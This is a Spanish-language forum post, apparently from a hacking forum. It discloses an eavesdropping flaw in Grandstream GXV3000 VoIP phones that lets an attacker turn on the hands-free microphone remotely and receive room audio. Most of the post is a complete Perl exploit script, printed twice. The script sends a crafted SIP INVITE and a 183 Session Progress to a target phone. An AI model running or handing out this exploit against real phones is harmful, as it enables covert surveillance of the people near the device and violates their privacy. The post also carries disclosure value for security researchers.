Autor
Los teléfonos de Voz sobre IP afectados son los Grandstream modelo GXV3000 con el último firm disponible (versión 1.0.1.7). El 'eavesdropping' o 'pinchazo telefónico' es uno de los fallos de seguridad mas peligrosos en Voz sobre IP ya que nos permite interceptar llamadas, en este caso se trata de dejar a la escucha el teléfono remoto, incluso estándo descolgado, utilizando el servicio de manos libres. Esta vulnerabilidad se da gracias al inseguro protocolo SIP por medio del método 'INVITE' . La vulnerabilidad consiste en que una vez lanzado el ataque, el teléfono atacado comienza a enviar tráfico RTP con el sonido ambiente que es capaz de capturar el micrófono de este.
Esté ataque se puede realizar también con:
SiVuS 1.09 beta - Escaner de vulnerabilidades para Voz sobre IP
http://foro.elhacker.net/index.php/topic,117438.0.html
Código:
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);
$socket=new IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0\r
o=username 0 0 IN IP4 $ARGV[3]\r
s=The Funky Flow\r
c=IN IP4 $ARGV[3]\r
t=0 0\r
m=audio 33404 RTP/AVP 3 97 0 8\r
a=rtpmap:0 PCMU/8000\r
a=rtpmap:3 GSM/8000\r
a=rtpmap:8 PCMA/8000\r
a=rtpmap:97 iLBC/8000\r
a=fmtp:97 mode=30\r\n";
$sdplen= length $sdp;
$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
sleep(3);
$msg=
"SIP/2.0 183 Session Progress\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);
$socket=new IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0\r
o=username 0 0 IN IP4 $ARGV[3]\r
s=The Funky Flow\r
c=IN IP4 $ARGV[3]\r
t=0 0\r
m=audio 33404 RTP/AVP 3 97 0 8\r
a=rtpmap:0 PCMU/8000\r
a=rtpmap:3 GSM/8000\r
a=rtpmap:8 PCMA/8000\r
a=rtpmap:97 iLBC/8000\r
a=fmtp:97 mode=30\r\n";
$sdplen= length $sdp;
$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
sleep(3);
$msg=
"SIP/2.0 183 Session Progress\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
Fuente: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065417.html
Web oficial del producto: http://www.grandstream.com/gxv3000.html
En línea
